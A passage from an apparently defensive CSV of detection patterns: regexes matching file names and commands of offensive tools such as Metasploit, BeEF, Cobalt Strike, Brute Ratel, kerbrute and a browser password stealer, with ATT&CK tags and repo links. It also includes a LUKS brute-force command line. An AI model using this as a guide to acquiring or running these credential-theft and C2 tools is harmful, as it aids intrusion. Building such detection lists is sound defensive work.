- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 
- T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*browser_autopwn2_spec.rb*",".{0,1000}browser_autopwn2_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*browser_exploit.rb*",".{0,1000}browser_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*browser_exploit_server_spec.rb*",".{0,1000}browser_exploit_server_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*BrowserBookmarkDiscovery_BrowserHistory.py*",".{0,1000}BrowserBookmarkDiscovery_BrowserHistory\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*Browser-C2.git*",".{0,1000}Browser\-C2\.git.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","100","27","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*Browser-C2-master.zip*",".{0,1000}Browser\-C2\-master\.zip.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","10","10","100","27","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z" "*browserexploitserver.rb*",".{0,1000}browserexploitserver\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*BrowserGhost-N*.exe*",".{0,1000}BrowserGhost\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*BrowserListener.py*",".{0,1000}BrowserListener\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Browser-password-stealer.git*",".{0,1000}Browser\-password\-stealer\.git.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*Browser-password-stealer-master*",".{0,1000}Browser\-password\-stealer\-master.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","10","4","368","59","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z" "*browserpivot *",".{0,1000}browserpivot\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 
- T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BrowsingHistoryView.cfg*",".{0,1000}BrowsingHistoryView\.cfg.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BrowsingHistoryView.exe*",".{0,1000}BrowsingHistoryView\.exe.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*browsinghistoryview.exe*",".{0,1000}browsinghistoryview\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*BROWSINGHISTORYVIEW.EXE-*.pf*",".{0,1000}BROWSINGHISTORYVIEW\.EXE\-.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - 
T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*BrowsingHistoryView.html*",".{0,1000}BrowsingHistoryView\.html.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*browsinghistoryview.zip*",".{0,1000}browsinghistoryview\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*browsinghistoryview-x64.zip*",".{0,1000}browsinghistoryview\-x64\.zip.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1602 - T1119 - T1005","TA0009","N/A","N/A","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*brun_script_in_mem*",".{0,1000}brun_script_in_mem.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","193","33","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" "*brunasadmin*",".{0,1000}brunasadmin.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Brute forcing SIDs at *",".{0,1000}Brute\sforcing\sSIDs\sat\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Brute/Brute.cs*",".{0,1000}Brute\/Brute\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Brute/Brute.csproj*",".{0,1000}Brute\/Brute\.csproj.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*Brute/Brute.sln*",".{0,1000}Brute\/Brute\.sln.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - 
T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*brute_force_ntlm.sh*",".{0,1000}brute_force_ntlm\.sh.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","8","4","328","69","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" "*bruteforce *.txt*",".{0,1000}bruteforce\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Brute-force Unsuccessful!*",".{0,1000}Brute\-force\sUnsuccessful!.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*bruteforce.go*",".{0,1000}bruteforce\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*BruteForce.ps1*",".{0,1000}BruteForce\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*Brute-Force.ps1*",".{0,1000}Brute\-Force\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*bruteforce_attack(*",".{0,1000}bruteforce_attack\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_mode_kerberos_mode*",".{0,1000}bruteforce_mode_kerberos_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_mode_ntlm_mode*",".{0,1000}bruteforce_mode_ntlm_mode.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*bruteforce_try_password_or_hash(*",".{0,1000}bruteforce_try_password_or_hash\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" 
"*bruteforce_try_user(*",".{0,1000}bruteforce_try_user\(.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*BruteforceCLSIDs.*",".{0,1000}BruteforceCLSIDs\..{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*bruteForceCombos*",".{0,1000}bruteForceCombos.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*Brute-force-Instagram-*.git*",".{0,1000}Brute\-force\-Instagram\-.{0,1000}\.git.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","1","N/A","7","1","47","10","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z" "*bruteforce-luks -*",".{0,1000}bruteforce\-luks\s\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bruteforce-luks -t 4 -l 5 -m 5 /dev/sdb1*",".{0,1000}bruteforce\-luks\s\-t\s4\s\-l\s5\s\-m\s5\s\/dev\/sdb1.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bruteForceUser*",".{0,1000}bruteForceUser.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*bruteloader*",".{0,1000}bruteloader.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*brute-locadmin *",".{0,1000}brute\-locadmin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - 
T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*brute-ratel-*",".{0,1000}brute\-ratel\-.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.tar.gz*",".{0,1000}BruteRatel.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*BruteRatel*.zip*",".{0,1000}BruteRatel.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
